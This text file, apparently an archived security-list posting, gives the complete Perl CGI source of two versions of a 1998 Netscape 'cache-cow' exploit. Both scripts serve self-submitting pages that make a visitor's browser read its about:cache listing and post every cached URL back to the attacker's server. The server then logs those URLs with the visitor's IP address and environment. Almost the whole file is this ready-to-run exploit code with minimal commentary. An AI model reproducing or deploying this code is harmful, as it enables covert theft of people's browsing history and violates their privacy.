netscape-cache-exploit.txt

`Below is source code for the two versions of the Netscape Cache  
exploit that was recently discovered by Dan Brumleve  
<[email protected]>, as found on his web site at  
http://www.shout.net/~nothing/cache-cow/index.html  
  
First version <cache-cow.cgi>, and then second version  
<view-cache-cow-4.06.cgi> listed.  
  
-----snip-----  
#!/usr/bin/perl  
#  
# cache-cow.cgi -- Dan Brumleve <[email protected]>, 1998.08.23  
  
my $self = "http://www.shout.net/nothing/cache-cow.cgi";  
  
if ($ENV{PATH_INFO}) {  
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;  
<html><body onLoad="document.f.submit()"><ba se href="about:"><for  
m name=f action=cache method=post><input type=submit></form></body>  
</html>  
EOF  
} elsif ($ENV{CONTENT_LENGTH}) {  
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s  
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}  
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=  
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)  
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(  
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP  
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".  
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".  
"browser:\n\n$history";  
} else {  
(my$url=<<" EOF")=~s/ |\n//g;print"Location: $url\n\n";  
$self/></a></body><script>function chunk(s){return("href=  
"+escape(s));}function moo(){if(!document.links.length){r  
eturn("");}var str=chunk(document.links[0]);var i=documen  
t.links.length;while(--i){str+="&"+chunk(document.links[i  
]);}return(str);}</script><body onLoad="document.f.cache.  
value=moo();document.f.submit()"><form action="$self" nam  
e=f method=post><input type=hidden name=cache><input type  
=submit></form><a href=$self  
EOF  
}  
  
exit 0;  
-----snip-----  
  
  
-----snip-----  
#!/usr/bin/perl  
#  
# cache-cow-4.06.cgi -- Dan Brumleve <[email protected]>, 1998.09.26  
  
my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";  
  
if ($ENV{QUERY_STRING}) {  
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;  
<html><head><script>function chunk(s){return("href=" + escape(s));}  
function moo(d){if(!d.l inks.length){return("");} var str=chunk(d.  
links[0]);var i=d.links.length;wh ile(--i){str+="&"+chunk(d.links[  
i]);} return(s tr);}function check(){ var m=moo(top.cache.document  
); if (m=="") { docume nt.location.reload(); return; }document.f.c  
ache.value=m;doc ument.f.submit();}</script></head><body onLoad="c  
heck()"><form acti on="$self" name=f target=_top method=post><inpu  
t type=hidden name=cac he><input type=submit></form></body></html>  
EOF  
} elsif ($ENV{PATH_INFO}) {  
(my$o=<<" EOF")=~s/\n| //g;print"Content-type: text/html\n\n".$o;  
<html><body onLoad="document.f.submit()"><ba se href="about:"><for  
m name=f action=cache method=post><input type=submit></form></body>  
</html>  
EOF  
} elsif ($ENV{CONTENT_LENGTH}) {  
my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s  
=shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}  
sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=  
join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)  
split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(  
FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP  
$_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".  
"ontent-type: text/plain\n\nHere are the URLs retrieved from your ".  
"browser:\n\n$history";  
} else {  
print"Content-type: text/html\n\n".<<" EOF";  
<html><head> <frameset rows="1,*"><frame src=  
"$self?cow" name=cow><frame src="$self/cache"  
name=cache></frameset></head></html>  
EOF  
}  
  
exit 0;  
-----snip-----  
`